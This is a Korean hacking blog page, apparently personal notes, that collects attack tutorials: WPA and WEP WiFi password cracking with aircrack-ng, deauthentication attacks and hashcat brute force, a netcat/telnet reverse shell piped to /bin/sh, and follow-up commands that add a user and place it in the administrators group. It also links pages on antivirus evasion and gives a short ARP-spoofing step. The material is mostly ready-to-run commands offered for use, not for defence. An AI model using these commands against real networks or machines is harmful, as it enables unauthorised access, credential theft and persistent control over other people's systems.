WiFi Crack - WPA
WiFi WPA Password Crack# airmon-ng stop wlan0# airmon-ng start wlan0 # kill PID 1단계 # airodump-ng wlan0mon ; Target BSSID CH ESSID 확인 # airodump-ng -c 채널 --bssid AP_HWaddr -w cap wlan0mon 2단계 WPA는 맨 처음에 연결을 요청할때만 암호화 키를 교환한다. 그러므로 연결을 강제로 끊어버려야한다. 그럼 다시 연결을 시도하는데 그 정보를 가로채므로 키를 알아낼수가 있다. # wifete 를 통하여 해당 WiFi를 선택하여 해당 정보를 수집한다. # aireplay-ng -0 5 -a BSSID(AP) -c 상대연결기기(Station) wlan0mon ; 연결을 끊..
2015.08.24
WiFi Crack - WEP
WiFi WEP Password Crack# iwconfig ; wlan의 존재여부를 확인 # airmon-ng stop wlan0 # airmon-ng start wlan0 # kill PID # ifconfig ; wlan0mon의 HWaadr을 기록해둠 # airodump-ng wlan0mon ; 현재 어떤 WiFi를 이용할 수 있는지 확인 ㄴ BSSID, CH, ENC, ESSID를 파악 BSSID는 공유기의 고유하드웨어주소라 할 수 있다. # airodump-ng -c 채널 --bssid AP_HWaddr -w 저장파일이름 wlan0mon 해당 AP의 주소를 가진 패킷을 수집 수집을 켜놓고 패킷을 더 모으기 위하여 거짓인증을 할 것이다. 4만개 정도 모아야함 # aireplay-ng -1 0 -..
2015.08.24
네트워크 해킹 순서 참고 사이트
http://gunsystems.egloos.com/m/6783092http://myungin.tistory.com/5http://blog.daum.net/sysnet924/162
2015.08.20
no image
Netcat Reverse Shell
Netcat Reverse Shell우선 두대의 PC가 필요하며 각 PC에는 Netcat이 필요하다 HOST PC에서 nc 를 cmd를 통해서 2개를 연 후> nc -l -p 1111> nc -l -p 2222위와 같이 두개의 port를 오픈한다. Target PC에선 nc 를 연 후 # telnet HOST_IP 1111 | /bin/sh | telnet HOST_IP 2222 이렇게 해주면 Host에서 port 1111로 오픈한 cmd 창을 통하여 명령어를 전달하면 port 2222를 통하여 결과값을 돌려 받을 수가 있다. 연결 후 'net user'라는 명령어를 사용하면 위 스크린샷 처럼 현재 시스템에 등록되어 있는 사용자를 보여준다. net user /add USER PASSWORD' 명령은 사용..
2015.08.15
no image
Cain&Abel - ARP_Spoofing Attack
왼쪽에 게이트웨이의 IP를 선택을 하고 오른쪽에 목표PC의 IP를 설정해준다. (반대일수도 있다..?기억이 잘안나네)
2015.03.23

WiFi WPA Password Crack


# airmon-ng stop wlan0

# airmon-ng start wlan0
# kill PID

1단계
# airodump-ng wlan0mon ; Target BSSID CH ESSID 확인
# airodump-ng -c 채널 --bssid AP_HWaddr -w cap wlan0mon

2단계
WPA는 맨 처음에 연결을 요청할때만 암호화 키를 교환한다. 그러므로 연결을 강제로 끊어버려야한다. 그럼 다시 연결을 시도하는데 그 정보를 가로채므로 키를 알아낼수가 있다.

# wifete 를 통하여 해당 WiFi를 선택하여 해당 정보를 수집한다.
# aireplay-ng -0 5 -a BSSID(AP) -c 상대연결기기(Station) wlan0mon    ; 연결을 끊기
여기까지하면 wifite가 정보수집을 완료하고 종료가 되어있을 것이다. 이제 브루트포스를 통하여 암호를 크랙할 것이다.

3단계
hashcat 툴을 사용할 것이다. 위에서 저장된 .cap 파일을 hashcat이 읽을 수가 없기에 파일 필터링ㅇ을 실행하여야한다.
# wpaclean out.cap input.cap    ; 을 통하여 중요 부분만을
# aircrack-ng out.cap -J 출력파일이름  ; 하면 .hccap 파일이 생성됨
# hashcat -m 2500 -a 3 out.hccap ?a?a?a?a?a?a?a?a?a?a

하지만 이게 올걸릴수 있으므로 cudahashcat을 설치하여 그래픽카드를 통하여 찾으면 속도를 그나마 향상 시킬수가 있다.
# cudahashcat -m 2500 -a 3 out.hccap ?a?a~~

차증면 .pot 라는 파일로 결과가 추출되어있다.

'Hacking > Network Hacking' 카테고리의 다른 글

WiFi Crack - WEP  (0) 2015.08.24
네트워크 해킹 순서 참고 사이트  (0) 2015.08.20
Netcat Reverse Shell  (0) 2015.08.15
Cain&Abel - ARP_Spoofing Attack  (0) 2015.03.23

WiFi WEP Password Crack


# iwconfig    ; wlan의 존재여부를 확인
# airmon-ng stop wlan0
# airmon-ng start wlan0
# kill PID

# ifconfig     ; wlan0mon의 HWaadr을 기록해둠
# airodump-ng wlan0mon    ; 현재 어떤 WiFi를 이용할 수 있는지 확인
    ㄴ BSSID, CH, ENC, ESSID를 파악
    BSSID는 공유기의 고유하드웨어주소라 할 수 있다.
# airodump-ng -c 채널 --bssid AP_HWaddr -w 저장파일이름 wlan0mon
 해당 AP의 주소를 가진 패킷을 수집
 수집을 켜놓고 패킷을 더 모으기 위하여 거짓인증을 할 것이다. 4만개 정도 모아야함

# aireplay-ng -1 0 -e ESSID(WiFi이름) -a BSSID(AP_HWaadr) -h my_mac wlan0mon
# aireplay-ng -3 -b BSSID -h my_mac wlan0mon    ; 패키을 많이 모으기 위한 방법(arp를 통한)

# aircrack-ng -z 캡처파일
 

'Hacking > Network Hacking' 카테고리의 다른 글

WiFi Crack - WPA  (0) 2015.08.24
네트워크 해킹 순서 참고 사이트  (0) 2015.08.20
Netcat Reverse Shell  (0) 2015.08.15
Cain&Abel - ARP_Spoofing Attack  (0) 2015.03.23

http://gunsystems.egloos.com/m/6783092

http://myungin.tistory.com/5

http://blog.daum.net/sysnet924/162

'Hacking > Network Hacking' 카테고리의 다른 글

WiFi Crack - WPA  (0) 2015.08.24
WiFi Crack - WEP  (0) 2015.08.24
Netcat Reverse Shell  (0) 2015.08.15
Cain&Abel - ARP_Spoofing Attack  (0) 2015.03.23

Netcat Reverse Shell


우선 두대의 PC가 필요하며 각 PC에는 Netcat이 필요하다

HOST PC에서 nc 를 cmd를 통해서 2개를 연 후

> nc -l -p 1111

> nc -l -p 2222

위와 같이 두개의 port를 오픈한다.


Target PC에선 nc 를 연 후 

# telnet HOST_IP 1111 | /bin/sh | telnet HOST_IP 2222 

이렇게 해주면 Host에서 port  1111로 오픈한 cmd 창을 통하여 명령어를 전달하면 port 2222를 통하여 결과값을 돌려 받을 수가 있다.


연결 후  'net user'라는 명령어를 사용하면 위 스크린샷 처럼 현재 시스템에 등록되어 있는 사용자를 보여준다. net user /add USER PASSWORD' 명령은 사용자를 시스템에 등록해준다. 예제로 1111의 비밀번호를 사용하는 test라는 사용자를 등록하였다.

그리고 'net localgroup administrators test /add'를 사용해서 test 사용자를 관리자 그룹으로 옮겨준다. 윈도우는 기본정책으로 관리자가 아니면 원격제어를 제한한다. 따라서 사용자를 관리자 그룹으로 만들어 주는 것이다. 관리자 그룹으로 이동시킨 사용자는 위 스크린샷 처럼 원격 로그인이 된다. 고유의 사용자를 만든 것이므로 사용자를 위한 여러 개인설정을 만든다.






백신우회

http://cdpython.tistory.com/22

http://0x191unauthorized.blogspot.kr/2011/08/antivirus-hiding.html


참고 사이트 및 출처

http://devanix.tistory.com/307

http://blog.daum.net/sysnet924/246

[출처] 리버스쏄|작성자 별향

[출처] 리버스쏄|작성자 별향

[출처] 리버스쏄|작성자 별향

[출처] 리버스쏄|작성자 별향

'Hacking > Network Hacking' 카테고리의 다른 글

WiFi Crack - WPA  (0) 2015.08.24
WiFi Crack - WEP  (0) 2015.08.24
네트워크 해킹 순서 참고 사이트  (0) 2015.08.20
Cain&Abel - ARP_Spoofing Attack  (0) 2015.03.23





왼쪽에 게이트웨이의 IP를 선택을 하고 오른쪽에 목표PC의 IP를 설정해준다. (반대일수도 있다..?기억이 잘안나네)




'Hacking > Network Hacking' 카테고리의 다른 글

WiFi Crack - WPA  (0) 2015.08.24
WiFi Crack - WEP  (0) 2015.08.24
네트워크 해킹 순서 참고 사이트  (0) 2015.08.20
Netcat Reverse Shell  (0) 2015.08.15